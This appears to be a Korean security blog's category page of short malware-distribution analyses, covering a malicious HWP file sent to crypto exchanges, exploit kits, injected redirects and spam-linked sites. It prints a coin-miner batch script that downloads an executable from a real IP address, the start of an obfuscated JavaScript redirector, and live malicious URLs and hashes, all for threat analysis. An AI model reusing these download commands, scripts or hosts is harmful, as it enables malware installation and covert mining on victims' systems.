본문 바로가기

security/악성코드 유포

[악성코드 유포] 코인(토큰) 상장 문의 메일을 통한 한글 악성코드 유포 분석 1. 개요 최근 APT(Advanced Persistent Threat) 공격이 증가하고 있는 추세입니다. 최근에는 코인 거래소가 활성화되고, 돈이 되면서 거래소의 관계자를 노리기 위한 공격이 주를 이루고 있습니다. 이번에 분석하게 된 파일은 코인 상장 신청서를 통해 주요 코인거래소에 유포된 것으로 확인된 한글 파일을 간단하게 분석하였습니다. “해당 메일은 코인원 계정에 발송된 것으로 확인되었습니다.” 2. 최초 이메일 발송 정보 2. 파일 정보 파일명 [WhitePaper+소개]신규코인_상장_신청서2.hwp MD5 95fe089b63c095bfb2b25e8c6914d19d 한글 파일 제목 EXRAYA 백서 파일 생성 날짜 2019년 11월 3일 일요일 오후 4:21:45 비밀번호 12345 3. 세부 .. 더보기
XMR CoinMiner (BAT + Hashfish) 안녕하세요? 올만에 글을 쓰게 됩니다. 이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다. 간락히 쓰고 그냥 MD5 공유 하려고 합니다. 1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일) 2. .bat 파일 구조 3. .bat 파일 실행 구조 (핵심) @echo off (웹 다운로드 부분) taskkill /im 3.exe /f md c:\windows\hashfish del c:\windows\hashfish\3.exe call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드) ping 127.0.0.1 -n 2 >nul if exis.. 더보기
CK Exploit Kit 4.13에 대한 간단 정리 회사를 퇴사하고 나서 가끔씩 글을 쓸 예정 입니다.정보가 많이 부족하긴 하지만 악성 스크립트 (국내 + 해외) / 파일분석 등을 적을 예정 입니다.포스팅을 하는 이유는 그냥 심심해서 입니다. 1. 발견 사이트 (유포지) cocoalba.kr/autojump/ad_xxxx/index.html 2. 최종 파일leeve.co.kr/apps/up.exe (현재 404)MD5 : 0952d38bf8b3f026cb3c41c87db338a7C&C : r.pengyou.com/fcg-bin/cgi_get_portrait.fcg?uins=2889622357[VT 결과]virustotal.com/ko/file/1dd1dbd6631b8b0b87d7bbab7aff004c983dbe87ba6c9e7fed851de4786e6ae.. 더보기
국내 웹사이트를 통해 유포되는 RIG Exploit Kit 아직도 유포중 - 간단히 끄적끄적 그냥 국내 웹사이트 중 리그킷 들어가 있는 곳을 발견해서 간단하게 흔적용으로 써봄. 1. 발견 사이트 http://www.irisxxxxxx.kr (꽃배달 사이트) → http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037 -→ http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] / (지속적인 링크 변경) --→ http://new.ceptenporxxxxxx.com/index.php?xH6Af7iYJBvPCoo=[하위생략] / 최종 악성코드 다운로드 2. 삽입 형태 http://www.irisxxxxxx.kr → _script type="text/javascript" src="http://autoxxxx.ru.. 더보기
RIG Exploit Kit 넌 누구냐? 올만에 블로그에 글을~간단하게 스샷 몇개만 ... 추후에 자세히?!? 1. 초기 스크립트 2. 1차 난독화 해제 3. 2차 난독화 해제 (취약성 + 최종 링크) 간단하게 정리 했습니다. 정보는 추후에 봐서 공유 하도록 하겠습니다. 마지막으로 도움을 주신 모든분께 감사하다는 말씀 드리고 싶습니다. 더보기
[Web Developer Forum - 2012.06.13] Malicious Code Inject: What Does It Do? 우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다. 1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")--> http://fukbb.com 2... 더보기
[악성 스크립트로 연결하는 스팸메일] I want you to be healthy 오랜만에 악성스크립트로 연결시키는 스팸메일을 내 이메일을 통해 받아서 기록해 둔다. 발신 : 수신 : 날짜 : 13-10-21 (월) 03:21제목 : I want you to be healthy [본문 내용] http://mhr.ro/pride.html Do you know what your lover wants during nights? [발신자 정보 위치 - bladechevy.com] [http://mhr.ro/pride.html - 사이트 본문 내용] [디코딩] Redirecting -> http://albertacanadapills.nl"> --------------------------------------------------------------------------------------.. 더보기
Trojan.JS.Redirector.zf [Kaspersky] 발견지 : http://gotosite.home.xs4all.nl/b&b/left.htmx (Trojan.JS.Redirector.zf - Kaspersky) -> http://deviced.com/vanilla/8BztG4W3.phx 바이러스 토탈 : https://www.virustotal.com/en/file/160b039d3ffc826fd73313780d61fb6f7e23d92da96dc40608e34cda2ab2c6d8/analysis/1372757516/ 우연히 돌아다니다가 발견해서 끄적끄적 해본다.....최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................ 쿠키값때문인가??아시는 분 계시면 알려주세요~ : ) e=eval;v="0"+"x";a=0;z="y";tr.. 더보기
Red Exploit Kit (CVE-2013-0422) 에서 변경된 Cool Exploit Kit(CVE-2013-2423) 도식화 한동안 잠잠했던 Red Exploit Kit 이 Cool Exploit Kit 으로 변경되어서 출현 하였다.우연히 발견하여서 도식화를 시켜놓는다. 국내에는 별로 영향력이 없지만 해외에서는 그래도 종종 나오나 보다. 검색을 하면 국내보다는 해외 블로그가 더 많이 보인다. 최근에 본 Sakura Exploit kit 에 이어서 Cool Exploit Kit 까지 국내에는 95% 공다팩이라면 해외에서는 Blackhole Exploit Kit ,Cool Exploit kit, Sakura Exploit kit 까지 많은 킷들이 활동을 하고 있다. Cool Exploit kit 자세한 정보 : http://malware.dontneedcoffee.com/2013/04/cve-2013-2423-integrating.. 더보기
개인 정보(주민등록번호 등..) 수집하는 성인 사이트 ! 스팸문자가 많은 요즘 한 통의 문자가 나에게 왔다.내용은 너무 선정적이라서 패쓰! 옆집 어쩌구 저쩌구......... 하면서 URL : http://thankyXX5.kr 왔다. 무료보기 3일뒤에 쥐도새도 모르게 16500원이 결제된다고 한다. 그럼 이용약관이 어떻게 될까 확인해보자........ 일단 이번에 새로 발효된 개인정보보호법 중 일부분 ! 2013년 2월 18일부터 시행되는 온라인상의 주민등록번호 수집 · 이용 금지에 따라서이제 인터넷에서 신규 회원 가입시 주민등록번호를 이용해서 가입할수 없습니다.(정보통신망 이용촉진 및 정보보호등에 관한 법률 제 23조의 2항(주민등록번호 사용제한 조항)) 2월 18일부터는 주민등록번호 수집.이용 금지 관련 법률 조항에 따라 회사는 온라인 회원가입 시 주민등.. 더보기